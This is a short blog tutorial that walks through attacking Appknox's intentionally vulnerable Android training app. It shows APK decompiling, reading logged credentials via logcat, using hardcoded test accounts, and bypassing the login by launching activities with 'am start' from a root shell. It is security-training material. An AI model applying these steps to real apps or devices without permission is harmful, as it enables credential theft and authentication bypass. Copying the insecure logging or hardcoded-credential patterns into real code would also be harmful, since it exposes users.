Let’s Hack Android: Appknox Vulnerable Application

ratiros01
4 min read · Apr 28, 2020

Requirements:

  1. Source code: https://github.com/appknox/vulnerable-application
  2. Android studio
  3. Android VM

Setting up Android Studio in Santoku:

Let’s start:

1. Git clone the project

git clone https://github.com/appknox/vulnerable-application.git

2. Open the project with Android Studio, fix the bugs, and re-compile

3. Connect to the VM

adb connect <ip>:5555

4. Build APK

5. Install the app

or use the command

adb install <file name>.apk

Because the app is old, running it may throw run-time exceptions. You will have to search Google for the fixes.

Here’s the app’s UI.

Reconnaissance

1. Dump the permissions

aapt dump permissions <file name>.apk

2. View the manifest file

apktool d vulnerable-application.apk --output vulnerable-application-apktool
cd vulnerable-application-apktool
ls -la
gedit AndroidManifest.xml

Besides the permissions, there are 3 activities.

The manifest also marks the app as debuggable.

3. View source code

Copy the APK and rename the copy to a zip file

cp vulnerable-application.apk vulnerable-application.zip

Extract

unzip vulnerable-application.zip -d vulnerable-application
cd vulnerable-application
ls -la

Decompile

dex2jar classes.dex
ls -la
jd-gui classes_dex2jar.jar

View “LoginActivity”

There are credentials in the code.

There’s also a log statement that writes the credentials.

View “NextView”

Nothing so far

View “FailView”

1. Insecure Logging

From the “Credentials” log

adb logcat | grep "Credentials"
username: foo@example.com, password: hellouu

Use it

Success!!!

2. Hardcoding

There are 2 hardcoded accounts in LoginActivity that I can use.

username: foo@example.com, password: hello
username: bar@example.com, password: world

Both accounts work

3. Bypassing log-in

adb shell

run as root

su

bypass to NextView

am start com.appknox.testapplication/.NextView

bypass to FailView

am start com.appknox.testapplication/.FailView
